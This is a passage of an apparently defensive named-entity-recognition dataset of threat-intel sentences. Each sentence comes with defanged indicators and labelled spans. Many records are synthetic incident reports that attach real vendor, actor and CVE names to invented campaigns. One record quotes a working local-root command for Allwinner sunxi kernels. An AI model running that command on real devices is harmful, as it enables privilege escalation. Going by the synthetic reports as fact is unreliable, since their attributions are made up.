Memory dump analysis confirmed execution of Merlin. Registry modifications pointed to persistence via C:\\Users\\admin\\Desktop\\payload.bin. Network forensics identified connections to 10[.]31[.]227[.]96 and staticcdn[ . ]site. Email headers traced the initial vector to updates@phishing-domain[ . ]com. File C:\\Program Files\\Common Files\\shell.php (SHA256: b7f96c25122d971a30a6da7d828ac0491c59cec9826a9f2f8092c08610872b0a) was identified as the initial dropper. A staging URL hxxps://storage-auth[.]org/login resolved to 174 [ . ] 11 [ . ] 205 [ . ] 27. Secondary artifact hash: SHA256: c66646656e6293aceb4c06e63a13d5ed9ea0d2962b25fd3fd8025a12f242ac3b.", "spans": {"Indicator: 10.31.227.96": [[298, 316]], "Indicator: staticcdn.site": [[321, 339]], "Indicator: updates@phishing-domain.com": [[384, 415]], "Indicator: b7f96c25122d971a30a6da7d828ac0491c59cec9826a9f2f8092c08610872b0a": [[471, 535]], "Indicator: hxxps://storage-auth.org/login": [[590, 622]], "Indicator: 174.11.205.27": [[635, 666]], "Indicator: c66646656e6293aceb4c06e63a13d5ed9ea0d2962b25fd3fd8025a12f242ac3b": [[701, 765]]}, "info": {"id": "synth_v2_01266", "source": "defanged_augment"}} {"text": "For exploiting this issue , any process running with any UID can be converted into root easily by simply using the following command : echo \" rootmydevice '' > /proc/sunxi_debug/sunxi_debug The Linux 3.4-sunxi kernel was originally designed to support the Android operating system on Allwinner ARM for tablets , but later it was used to port Linux to many Allwinner processors on boards like Banana Pi micro-PCs , Orange Pi , and other devices . The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) . Outlaw : hxxp://www[.]minpop[.]com/sk12pack/idents.php Command and control . 
The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": {"System: Android": [[256, 263]], "Organization: Allwinner": [[284, 293], [356, 365]], "System: ARM": [[294, 297]], "System: Linux": [[342, 347]], "System: Banana Pi micro-PCs": [[392, 411]], "System: Orange Pi": [[414, 423]], "Indicator: http://www.minpop.com/sk12pack/idents.php": [[671, 716]]}, "info": {"id": "cyberner_stix_train_001401", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: NCSC identified a large-scale phishing operation. Emails originated from alert@secure-verify[.]net and confirm@document-share[ . ]link, spoofing legitimate services. Victims were directed to hxxps://nodebackup[ . ]dev/download/update.exe which hosted a credential harvesting page on cachemail[.]online. A secondary link hxxps://portalsync[.]club/collect delivered REvil (MD5: bd1f390128381e503e45e864a4199839). The malware was saved to /dev/shm/winlogon.exe and established C2 with 194[.]64[.]56[.]216.", "spans": {"Organization: NCSC": [[26, 30]], "Indicator: alert@secure-verify.net": [[99, 124]], "Indicator: confirm@document-share.link": [[129, 160]], "Indicator: https://nodebackup.dev/download/update.exe": [[217, 263]], "Indicator: cachemail.online": [[309, 327]], "Indicator: https://portalsync.club/collect": [[346, 379]], "Malware: REvil": [[390, 395]], "Indicator: bd1f390128381e503e45e864a4199839": [[402, 434]], "Indicator: 194.64.56.216": [[508, 527]]}, "info": {"id": "synth_v2_00890", "source": "defanged_augment"}} {"text": "Mandiant observed APT29, also known as Cozy Bear, conducting phishing campaigns using Microsoft 365 tokens stolen from compromised organizations. The group deployed a new variant of SUNSHUTTLE malware communicating over HTTPS with domains hosted on Cloudflare infrastructure. 
Indicators included connections to the domain solartrackingsystem[.]net and IP address 185 [ . ] 220 [ . ] 101 [ . ] 34.", "spans": {"Organization: Mandiant": [[0, 8]], "System: Microsoft 365": [[86, 99]], "Malware: SUNSHUTTLE": [[182, 192]], "System: Cloudflare": [[249, 259]], "Indicator: solartrackingsystem.net": [[322, 347]], "Indicator: 185.220.101.34": [[363, 395]]}, "info": {"id": "mandiant_00035", "source": "defanged_augment"}} {"text": "Blog Post by Volexity: Tracking APT29's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24628 against Active Directory deployments. The initial access vector involves spear-phishing emails from verify@phishing-domain[ . ]com delivering SmokeLoader. Post-compromise, the attackers deploy AgentTesla and use SharpHound for reconnaissance. C2 infrastructure includes 127 [ . ] 84 [ . ] 161 [ . ] 27 and updatecache[ . ]site. A staging server at hxxp://relay-cdn[.]cc/wp-content/uploads/doc.php hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\lsass.dmp (SHA256: eefcdddac4d795c844e61cda7c36a1a9f36c063c111b779e2e4ed7e2e761816d).", "spans": {"Organization: Volexity": [[13, 21]], "Vulnerability: CVE-2020-24628": [[117, 131]], "System: Active Directory": [[140, 156]], "Indicator: verify@phishing-domain.com": [[232, 262]], "Malware: SmokeLoader": [[274, 285]], "Malware: AgentTesla": [[325, 335]], "Indicator: 127.84.161.27": [[402, 433]], "Indicator: updatecache.site": [[438, 458]], "Indicator: http://relay-cdn.cc/wp-content/uploads/doc.php": [[480, 528]], "Indicator: eefcdddac4d795c844e61cda7c36a1a9f36c063c111b779e2e4ed7e2e761816d": [[614, 678]]}, "info": {"id": "synth_v2_01557", "source": "defanged_augment"}} {"text": "Vulnerability in the Primavera P6 Enterprise Project Portfolio Management product of Oracle Construction and Engineering (component: Core). Supported versions that are affected are 16 [ . ] 2 [ . ] 0 [ . ] 0-16 [ . ] 2 [ . ] 19 [ . ] 0, 17 [ . ] 12 [ . ] 0 [ . 
] 0-17 [ . ] 12 [ . ] 16 [ . ] 0, 18 [ . ] 8 [ . ] 0 [ . ] 0-18[.]8[.]16[.]0, 19[.]12[.]0[.]0 and 20 [ . ] 1 [ . ] 0 [ . ] 0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Primavera P6 Enterprise Project Portfolio Management executes to compromise Primavera P6 Enterprise Project Portfolio Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Primavera P6 Enterprise Project Portfolio Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Primavera P6 Enterprise Project Portfolio Management accessible data as well as unauthorized read access to a subset of Primavera P6 Enterprise Project Portfolio Management accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Primavera P6 Enterprise Project Portfolio Management. CVSS 3.0 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L).", "spans": {"Indicator: 16.2.0.0": [[181, 207]], "Indicator: 16.2.19.0": [[208, 235]], "Indicator: 17.12.0.0": [[237, 264]], "Indicator: 17.12.16.0": [[265, 293]], "Indicator: 18.8.0.0": [[295, 321]], "Indicator: 18.8.16.0": [[322, 337]], "Indicator: 19.12.0.0": [[339, 354]], "Indicator: 20.1.0.0": [[359, 385]], "Organization: Oracle": [[85, 91]], "Vulnerability: denial of service": [[1212, 1229]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2556"}} {"text": "However , the C2 can send an updated list . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 . The malware then proceeds to beacon to a configured remote server of cswksfwq[ . ]kfesv[ . ]xyz on TCP port 8080 . 
When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"Indicator: cswksfwq.kfesv.xyz": [[202, 228]], "Organization: Bradshaw": [[253, 261]], "Organization: he and his then - girlfriend": [[291, 319]]}, "info": {"id": "cyberner_stix_train_001948", "source": "defanged_augment"}} {"text": "The actor sends an email to trala[ . ]cosh2@post[ . ]cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload .", "spans": {"Indicator: trala.cosh2@post.cz": [[28, 55]], "Malware: Cannon": [[129, 135]], "Malware: Trojan": [[136, 142]]}, "info": {"id": "cyberner_stix_train_004421", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncxl/mbox: validate payload size before accessing contents in cxl_payload_from_user_allowed()\n\ncxl_payload_from_user_allowed() casts and dereferences the input\npayload without first verifying its size. 
When a raw mailbox command\nis sent with an undersized payload (ie: 1 byte for CXL_MBOX_OP_CLEAR_LOG,\nwhich expects a 16-byte UUID), uuid_equal() reads past the allocated buffer,\ntriggering a KASAN splat:\n\nBUG: KASAN: slab-out-of-bounds in memcmp+0x176/0x1d0 lib/string.c:683\nRead of size 8 at addr ffff88810130f5c0 by task syz.1.62/2258\n\nCPU: 2 UID: 0 PID: 2258 Comm: syz.1.62 Not tainted 6.19.0-dirty #3 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[.]17[.]0-0-gb52ca86e094d-prebuilt[.]qemu[.]org 04/01/2014\nCall Trace:\n \n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0xab/0xe0 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xce/0x650 mm/kasan/report.c:482\n kasan_report+0xce/0x100 mm/kasan/report.c:595\n memcmp+0x176/0x1d0 lib/string.c:683\n uuid_equal include/linux/uuid.h:73 [inline]\n cxl_payload_from_user_allowed drivers/cxl/core/mbox.c:345 [inline]\n cxl_mbox_cmd_ctor drivers/cxl/core/mbox.c:368 [inline]\n cxl_validate_cmd_from_user drivers/cxl/core/mbox.c:522 [inline]\n cxl_send_cmd+0x9c0/0xb50 drivers/cxl/core/mbox.c:643\n __cxl_memdev_ioctl drivers/cxl/core/memdev.c:698 [inline]\n cxl_memdev_ioctl+0x14f/0x190 drivers/cxl/core/memdev.c:713\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xa8/0x330 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7fdaf331ba79\nCode: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007fdaf1d77038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007fdaf3585fa0 RCX: 00007fdaf331ba79\nRDX: 00002000000001c0 RSI: 00000000c030ce02 
RDI: 0000000000000003\nRBP: 00007fdaf33749df R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007fdaf3586038 R14: 00007fdaf3585fa0 R15: 00007ffced2af768\n \n\nAdd 'in_size' parameter to cxl_payload_from_user_allowed() and validate\nthe payload is large enough.", "spans": {"Indicator: rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org": [[751, 803]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[709, 713]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-23327"}} {"text": "Blog Post by Volexity: Tracking Flax Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-24628 against F5 BIG-IP deployments. The initial access vector involves spear-phishing emails from noreply@auth-check[.]org delivering BatLoader. Post-compromise, the attackers deploy Qbot and use Certutil for reconnaissance. C2 infrastructure includes 172[.]203[.]244[.]108 and cacheproxy[ . ]dev. A staging server at hxxps://relay-node[ . ]com/wp-content/uploads/doc.php hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\shell.php (MD5: ff7db5eeadfae91a09a64659eb7107ad).", "spans": {"Organization: Volexity": [[13, 21]], "Vulnerability: CVE-2020-24628": [[124, 138]], "System: F5 BIG-IP": [[147, 156]], "Indicator: noreply@auth-check.org": [[232, 256]], "Malware: BatLoader": [[268, 277]], "Malware: Qbot": [[317, 321]], "Indicator: 172.203.244.108": [[386, 407]], "Indicator: cacheproxy.dev": [[412, 430]], "Indicator: https://relay-node.com/wp-content/uploads/doc.php": [[452, 505]], "Indicator: ff7db5eeadfae91a09a64659eb7107ad": [[588, 620]]}, "info": {"id": "synth_v2_01615", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Palo Alto Unit 42 identified a large-scale phishing operation. Emails originated from it@login-portal[.]tech and info@secure-verify[.]net, spoofing legitimate services. Victims were directed to hxxp://mail-edge[ . 
]xyz/login which hosted a credential harvesting page on loginauth[.]io. A secondary link hxxp://proxycloud[ . ]cc/collect delivered Lumma Stealer (SHA1: b7f7faea666f9b7b21dbbd124a8f7d5e5a9f3c8d). The malware was saved to /home/user/.config/payload.bin and established C2 with 156 [ . ] 119 [ . ] 242 [ . ] 105.", "spans": {"Organization: Palo Alto Unit 42": [[26, 43]], "Indicator: it@login-portal.tech": [[112, 134]], "Indicator: info@secure-verify.net": [[139, 163]], "Indicator: hxxp://mail-edge.xyz/login": [[220, 250]], "Indicator: loginauth.io": [[296, 310]], "Indicator: http://proxycloud.cc/collect": [[329, 361]], "Malware: Lumma Stealer": [[372, 385]], "Indicator: b7f7faea666f9b7b21dbbd124a8f7d5e5a9f3c8d": [[393, 433]], "Indicator: 156.119.242.105": [[516, 549]]}, "info": {"id": "synth_v2_01098", "source": "defanged_augment"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. The `tf.raw_ops.Conv3DBackprop*` operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0. This is because the implementation(hxxps://github[ . ]com/tensorflow/tensorflow/blob/a91bb59769f19146d5a0c20060244378e878f140/tensorflow/core/kernels/conv_grad_ops_3d.cc#L430-L450) does not check that the divisor used in computing the shard size is not zero. Thus, if attacker controls the input sizes, they can trigger a denial of service via a division by zero error. The fix will be included in TensorFlow 2.5.0. 
We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/a91bb59769f19146d5a0c20060244378e878f140/tensorflow/core/kernels/conv_grad_ops_3d.cc#L430-L450": [[252, 396]], "Vulnerability: denial of service": [[539, 556]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29522"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 162 [ . ] 20 [ . ] 134, the Check Point Research IR team identified PlugX running as C:\\Users\\admin\\Desktop\\loader.exe. The threat actor, believed to be Aqua Blizzard, used Mythic for credential harvesting and Hashcat for lateral movement. Exfiltrated data was sent to storagedata[ . ]xyz and data-data[.]cc. The initial dropper (MD5: c9d4fbb81665eda7221f0d026f030894) was delivered via a phishing email from admin@secure-verify[.]net. A second C2 node was observed at 166[.]147[.]12[.]59, with a persistence mechanism writing to /opt/app/bin/config.dat.", "spans": {"Indicator: 172.162.20.134": [[64, 96]], "Organization: Check Point Research": [[102, 122]], "Malware: PlugX": [[142, 147]], "Indicator: storagedata.xyz": [[343, 362]], "Indicator: data-data.cc": [[367, 381]], "Indicator: c9d4fbb81665eda7221f0d026f030894": [[409, 441]], "Indicator: admin@secure-verify.net": [[483, 508]], "Indicator: 166.147.12.59": [[543, 562]]}, "info": {"id": "synth_v2_00320", "source": "defanged_augment"}} {"text": "A backdoor also known as: TrojanDownloader.Tandfuy Trojan.Symmi.DA610 BehavesLike[ . ]Win32[ . ]Dropper[ . 
]lt Trojan-Downloader.Win32.Tandfuy W32/Trojan.ZKSQ-8249 TR/Bipamid.dnrhz TrojanDownloader:Win32/Tandfuy.B Trojan/Win32.AVKill.R107811 Trj/GdSda.A Win32/Bipamid.C", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Dropper.lt": [[70, 110]]}, "info": {"id": "cyner2_train_003950", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-23934 is a critical deserialization flaw affecting Active Directory. Dragos confirmed active exploitation by Forest Blizzard in the wild. Exploitation delivers Latrodectus (SHA1: e44dcf22967b3149e6b8edffb8972530d2749634) which is dropped to C:\\Users\\Public\\Documents\\svchost.exe. The exploit payload is hosted at hxxp://proxy-static[.]cc/gate.php and communicates to 192[.]107[.]185[.]177 for C2.", "spans": {"Vulnerability: CVE-2024-23934": [[24, 38]], "Vulnerability: deserialization flaw": [[53, 73]], "System: Active Directory": [[84, 100]], "Organization: Dragos": [[102, 108]], "Malware: Latrodectus": [[193, 204]], "Indicator: e44dcf22967b3149e6b8edffb8972530d2749634": [[212, 252]], "Indicator: hxxp://proxy-static.cc/gate.php": [[346, 379]], "Indicator: 192.107.185.177": [[400, 421]]}, "info": {"id": "synth_v2_00765", "source": "defanged_augment"}} {"text": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat[.]io.", "spans": {"Indicator: jrat.io": [[325, 334]], "Malware: jRAT": [[0, 4], [279, 283]], "Malware: Jacksbot": [[20, 28]], "System: Java": [[64, 68]], "System: macOS": [[89, 94]], "System: Windows": [[103, 110]], "System: Linux": [[96, 101]], "Vulnerability: DDoS": [[172, 176]]}, "info": {"source": "defanged_augment", "name": "jRAT"}} {"text": "keypair is a a RSA PEM key generator written in javascript. 
keypair implements a lot of cryptographic primitives on its own or by borrowing from other libraries where possible, including node-forge. An issue was discovered where this library was generating identical RSA keys used in SSH. This would mean that the library is generating identical P, Q (and thus N) values which, in practical terms, is impossible with RSA-2048 keys. Generating identical values, repeatedly, usually indicates an issue with poor random number generation, or, poor handling of CSPRNG output. Issue 1: Poor random number generation (`GHSL-2021-1012`). The library does not rely entirely on a platform provided CSPRNG, rather, it uses it's own counter-based CMAC approach. Where things go wrong is seeding the CMAC implementation with \"true\" random data in the function `defaultSeedFile`. In order to seed the AES-CMAC generator, the library will take two different approaches depending on the JavaScript execution environment. In a browser, the library will use [`window.crypto.getRandomValues()`](hxxps://github[.]com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L971). However, in a nodeJS execution environment, the `window` object is not defined, so it goes down a much less secure solution, also of which has a bug in it. It does look like the library tries to use node's CSPRNG when possible unfortunately, it looks like the `crypto` object is null because a variable was declared with the same name, and set to `null`. So the node CSPRNG path is never taken. However, when `window.crypto.getRandomValues()` is not available, a Lehmer LCG random number generator is used to seed the CMAC counter, and the LCG is seeded with `Math.random`. While this is poor and would likely qualify in a security bug in itself, it does not explain the extreme frequency in which duplicate keys occur. The main flaw: The output from the Lehmer LCG is encoded incorrectly. The specific [line][hxxps://github[ . 
]com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L1008] with the flaw is: `b.putByte(String.fromCharCode(next & 0xFF))` The [definition](hxxps://github[.]com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L350-L352) of `putByte` is `util.ByteBuffer.prototype.putByte = function(b) {this.data += String.fromCharCode(b);};`. Simplified, this is `String.fromCharCode(String.fromCharCode(next & 0xFF))`. The double `String.fromCharCode` is almost certainly unintentional and the source of weak seeding. Unfortunately, this does not result in an error. Rather, it results most of the buffer containing zeros. Since we are masking with 0xFF, we can determine that 97% of the output from the LCG are converted to zeros. The only outputs that result in meaningful values are outputs 48 through 57, inclusive. The impact is that each byte in the RNG seed has a 97% chance of being 0 due to incorrect conversion. When it is not, the bytes are 0 through 9. In summary, there are three immediate concerns: 1. The library has an insecure random number fallback path. Ideally the library would require a strong CSPRNG instead of attempting to use a LCG and `Math.random`. 2. The library does not correctly use a strong random number generator when run in NodeJS, even though a strong CSPRNG is available. 3. The fallback path has an issue in the implementation where a majority of the seed data is going to effectively be zero. Due to the poor random number generation, keypair generates RSA keys that are relatively easy to guess. 
This could enable an attacker to decrypt confidential messages or gain authorized access to an account belonging to the victim.", "spans": {"Indicator: https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L971": [[1077, 1178]], "Indicator: https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L1008]": [[1991, 2096]], "Indicator: https://github.com/juliangruber/keypair/blob/87c62f255baa12c1ec4f98a91600f82af80be6db/index.js#L350-L352": [[2178, 2284]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-41117"}} {"text": "TG-3390 actors frequently change the C2 domain's A record to point to the loopback IP address 127 [ . ] 0 [ . ] 0 [ . ] 1 , which is a variation of a technique known as \" parking \" .", "spans": {"Indicator: 127.0.0.1": [[94, 121]]}, "info": {"id": "cyberner_stix_train_002423", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 10 [ . ] 26 [ . ] 194 [ . ] 105, the Dragos IR team identified LockBit running as /usr/local/bin/csrss.exe. The threat actor, believed to be Storm-0558, used Mimikatz for credential harvesting and ADFind for lateral movement. Exfiltrated data was sent to proxycdn[.]io and cdnbackup[.]net. The initial dropper (SHA1: 931d2b1b337ec916c0bfdb69ce322c130ae6a1a8) was delivered via a phishing email from helpdesk@auth-check[ . ]org. 
A second C2 node was observed at 180[.]118[.]113[.]87, with a persistence mechanism writing to /usr/local/bin/csrss.exe.", "spans": {"Indicator: 10.26.194.105": [[64, 95]], "Organization: Dragos": [[101, 107]], "Malware: LockBit": [[127, 134]], "Indicator: proxycdn.io": [[319, 332]], "Indicator: cdnbackup.net": [[337, 352]], "Indicator: 931d2b1b337ec916c0bfdb69ce322c130ae6a1a8": [[381, 421]], "Indicator: helpdesk@auth-check.org": [[463, 490]], "Indicator: 180.118.113.87": [[525, 545]]}, "info": {"id": "synth_v2_00351", "source": "defanged_augment"}} {"text": "Red Alert 2.0 IoCs list C2 addresses 103[.]239[.]30[.]126:7878 146 [ . ] 185 [ . ] 241 [ . ] 29:7878 146 [ . ] 185 [ . ] 241 [ . ] 42:7878 185[.]126[.]200[.]3:7878 185[.]126[.]200[.]12:7878 185 [ . ] 126 [ . ] 200 [ . ] 15:7878 185[.]126[.]200[.]18:7878 185 [ . ] 165 [ . ] 28 [ . ] 15:7878 185[.]243[.]243[.]241:7878 185 [ . ] 243 [ . ] 243 [ . ] 244:7878 185 [ . ] 243 [ . ] 243 [ . ] 245:7878 Domains Malware source Web hosts", "spans": {"Malware: Red Alert 2.0": [[0, 13]], "Indicator: 103.239.30.126": [[37, 57]], "Indicator: 146.185.241.29": [[63, 95]], "Indicator: 146.185.241.42": [[101, 133]], "Indicator: 185.126.200.3": [[139, 158]], "Indicator: 185.126.200.12": [[164, 184]], "Indicator: 185.126.200.15": [[190, 222]], "Indicator: 185.126.200.18": [[228, 248]], "Indicator: 185.165.28.15": [[254, 285]], "Indicator: 185.243.243.241": [[291, 312]], "Indicator: 185.243.243.244": [[318, 351]], "Indicator: 185.243.243.245": [[357, 390]]}, "info": {"id": "cyner_train_000258", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-31252 is a critical use-after-free affecting Palo Alto PAN-OS. Secureworks confirmed active exploitation by MuddyWater in the wild. Exploitation delivers Conti (MD5: 79c0570fefe4c222f367eb4e443e6786) which is dropped to /dev/shm/loader.exe. The exploit payload is hosted at hxxps://dataauth[ . ]dev/login and communicates to 172 [ . ] 211 [ . ] 112 [ . 
] 169 for C2.", "spans": {"Vulnerability: CVE-2024-31252": [[24, 38]], "Vulnerability: use-after-free": [[53, 67]], "System: Palo Alto PAN-OS": [[78, 94]], "Organization: Secureworks": [[96, 107]], "Malware: Conti": [[187, 192]], "Indicator: 79c0570fefe4c222f367eb4e443e6786": [[199, 231]], "Indicator: hxxps://dataauth.dev/login": [[307, 337]], "Indicator: 172.211.112.169": [[358, 391]]}, "info": {"id": "synth_v2_00824", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172[.]247[.]117[.]115, the Microsoft MSRC IR team identified FormBook running as C:\\Users\\Public\\Documents\\chrome_helper.exe. The threat actor, believed to be BlackTech, used Impacket for credential harvesting and Chisel for lateral movement. Exfiltrated data was sent to cachelogin[.]cc and backupstorage[ . ]tech. The initial dropper (SHA1: c363c62d1d740381be1f3d0b5b172d59e5119af3) was delivered via a phishing email from notification@credential-check[.]site. A second C2 node was observed at 59 [ . ] 64 [ . ] 125 [ . 
] 199, with a persistence mechanism writing to C:\\Program Files\\Common Files\\ntds.dit.", "spans": {"Indicator: 172.247.117.115": [[64, 85]], "Organization: Microsoft MSRC": [[91, 105]], "Malware: FormBook": [[125, 133]], "Indicator: cachelogin.cc": [[336, 351]], "Indicator: backupstorage.tech": [[356, 378]], "Indicator: c363c62d1d740381be1f3d0b5b172d59e5119af3": [[407, 447]], "Indicator: notification@credential-check.site": [[489, 525]], "Indicator: 59.64.125.199": [[560, 591]]}, "info": {"id": "synth_v2_00425", "source": "defanged_augment"}} {"text": "A backdoor also known as: Joke/W32.BadJoke.230912 Hoax.Fakedel JokeTool.RJLSoftware Aplicacion/FakeDel.c W32/Joke[.]BE Joke.FakeDel JOKE_FAKEDEL.C Win.Joke.FakeDelete-1 Hoax.Win32.BadJoke.FakeDel.c Riskware.Win32.FakeDel.hsrd Hoax.W32.BadJoke.FakeDel.c!c Joke.Fakedel Tool.BadJoke.Win32.441 JOKE_FAKEDEL.C not-a-virus:BadJoke.Win32.FakeDel.b W32/Joke.HLOW-7548 Hoax.BadJoke.FakeDel.a Joke:Win32/Fakedel.C JOKE/FakeDel.C HackTool[Hoax]/Win32.FakeDel Joke:Win32/Fakedel.C Hoax.Win32.BadJoke.FakeDel.c BadJoke.Win32.FakeDel.c Joke/Fakedel.D Win32.Trojan-psw.Badjoke.Svrk Trojan.BadJoke!Ig2iP/M1kgM Win32/Joke.309", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Joke.BE": [[109, 118]]}, "info": {"id": "cyner2_train_006426", "source": "defanged_augment"}} {"text": "Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface[ . 
]xls and XLS-withyourface – test[.]xls .", "spans": {"Organization: Group-IB": [[0, 8]], "Malware: malicious Microsoft Word attachment": [[70, 105]], "Indicator: XLS-withyourface.xls": [[282, 306]], "Indicator: XLS-withyourface – test.xls": [[311, 340]]}, "info": {"id": "cyberner_stix_train_005542", "source": "defanged_augment"}} {"text": "NSA published a threat intelligence report linking Salt Typhoon to a new campaign exploiting CVE-2023-16619 in Active Directory. The attackers deployed NjRAT via Impacket, establishing C2 communication with 55[.]67[.]242[.]63 and gateway-mail[ . ]site. A secondary payload was downloaded from hxxps://relaycdn[ . ]top/login. The malware binary (MD5: 67e8d86f5cedfc3d30443604f6492700) was dropped to /opt/app/bin/taskhost.exe. Phishing emails were sent from helpdesk@login-portal[.]tech targeting enterprise users. A backup C2 server was identified at 207[.]208[.]97[.]25.", "spans": {"Organization: NSA": [[0, 3]], "Vulnerability: CVE-2023-16619": [[93, 107]], "System: Active Directory": [[111, 127]], "Malware: NjRAT": [[152, 157]], "Indicator: 55.67.242.63": [[207, 225]], "Indicator: gateway-mail.site": [[230, 251]], "Indicator: hxxps://relaycdn.top/login": [[293, 323]], "Indicator: 67e8d86f5cedfc3d30443604f6492700": [[350, 382]], "Indicator: helpdesk@login-portal.tech": [[457, 485]], "Indicator: 207.208.97.25": [[551, 570]]}, "info": {"id": "synth_v2_00003", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Ligolo artifacts at /etc/cron.d/csrss.exe. Memory dump analysis confirmed execution of Mythic. Registry modifications pointed to persistence via /dev/shm/runtime.dll. Network forensics identified connections to 192[.]146[.]23[.]43 and backup-backup[.]link. Email headers traced the initial vector to service@account-update[.]xyz. 
File C:\\Windows\\Tasks\\taskhost.exe (SHA256: 1ff87a3242603df5ce3ddba89cc5f2f31079c78864870f82fc55c1c768413c65) was identified as the initial dropper. A staging URL hxxp://gatewaycloud[ . ]club/login resolved to 10[.]147[.]194[.]247. Secondary artifact hash: SHA1: 24190d58ef6ef86fbaa35fd3ea497f19b60589e8.", "spans": {"Indicator: 192.146.23.43": [[283, 302]], "Indicator: backup-backup.link": [[307, 327]], "Indicator: service@account-update.xyz": [[372, 400]], "Indicator: 1ff87a3242603df5ce3ddba89cc5f2f31079c78864870f82fc55c1c768413c65": [[446, 510]], "Indicator: hxxp://gatewaycloud.club/login": [[565, 599]], "Indicator: 10.147.194.247": [[612, 632]], "Indicator: 24190d58ef6ef86fbaa35fd3ea497f19b60589e8": [[665, 705]]}, "info": {"id": "synth_v2_01123", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2023-46500 is a critical type confusion affecting Ubuntu 22.04. Rapid7 confirmed active exploitation by Flax Typhoon in the wild. Exploitation delivers TrickBot (SHA256: ee0508d79eda99bc7532b2fab948d2a2783d945d49b281c83991cb91779ec170) which is dropped to C:\\Windows\\System32\\ntds.dit. The exploit payload is hosted at hxxp://datadata[ . ]site/secure/token and communicates to 192 [ . ] 146 [ . ] 55 [ . 
